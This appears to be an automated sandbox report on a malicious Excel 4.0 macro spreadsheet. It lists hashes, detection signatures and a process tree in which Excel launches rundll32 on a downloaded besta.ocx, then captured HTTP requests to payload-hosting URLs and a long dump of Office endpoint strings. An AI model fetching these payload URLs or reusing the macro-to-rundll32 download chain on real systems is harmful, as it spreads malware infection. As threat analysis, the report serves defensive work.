Windows Analysis Report CU-6431 report.xlsm

Overview

General Information

Sample Name: CU-6431 report.xlsm
Analysis ID: 532531
MD5: 0630d6c04e8365531eff7998a7fc40c6
SHA1: e4c59420e2024e4f5f5a14e0cd366023d9d0e636
SHA256: bd2212ffe0d388a61a3041f146a70b242fa69eace0c7a5f5fe991126a679eec4

Detection

Hidden Macro 4.0
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Contains functionality to detect virtual machines (SLDT)
JA3 SSL client fingerprint seen in connection with other malware
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7136 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6680 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • BackgroundTransferHost.exe (PID: 6680 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: app.xml | Rule: JoeSecurity_XlsWithMacro4 | Description: Yara detected Xls With Macro 4.0 | Author: Joe Security

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started
    Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
    Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7136, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935, ProcessId: 6680

    Jbx Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: CU-6431 report.xlsm | Virustotal: Detection: 30%
    Source: CU-6431 report.xlsm | ReversingLabs: Detection: 20%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknown | HTTPS traffic detected: 162.240.9.126:443 -> 192.168.2.3:49745 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 107.180.46.229:443 -> 192.168.2.3:49747 version: TLS 1.2

    Software Vulnerabilities:

    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
    Source: global traffic | TCP traffic: 192.168.2.3:49744 -> 162.240.9.126:80
    Source: global traffic | DNS query: name: standoutglobal.com
    Source: global traffic | TCP traffic: 192.168.2.3:49745 -> 162.240.9.126:443
    Source: global traffic | HTTP traffic detected:
        GET /2/MWpqeVgZ/ HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Connection: Keep-Alive
        Host: standoutglobal.com
    Source: global traffic | HTTP traffic detected:
        GET / HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Connection: Keep-Alive
        Host: vendes.marketing
    Source: global traffic | HTTP traffic detected:
        GET /2/MWpqeVgZ/ HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: standoutglobal.com
        Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected:
        GET /transmigrant/Wplzr/ HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: vendes.marketing
        Connection: Keep-Alive
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.dr | String found in binary or memory: src="https://www.facebook.com/tr?id=408176514230511&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Thu, 02 Dec 2021 10:35:21 GMT
        Server: Apache
        Vary: Accept-Encoding,Cookie
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        Link: <https://standoutglobal.com/wp-json/>; rel="https://api.w.org/"
        Upgrade: h2,h2c
        Connection: Upgrade, close
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosy
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyures
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://config.edge.skype.com
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://connect.facebook.net/es_LA/sdk/xfbml.customerchat.js
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cortana.ai
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cortana.ai/api
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apiI.
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietlF/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cr.office.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://cr.office.com_/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comE
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comH
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comK
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comn
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com~
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile~
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesvU
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dev.cortana.ai
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://devnull.onenote.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://directory.services.
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1B5
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/u
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlP3H
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.com0
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2F
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
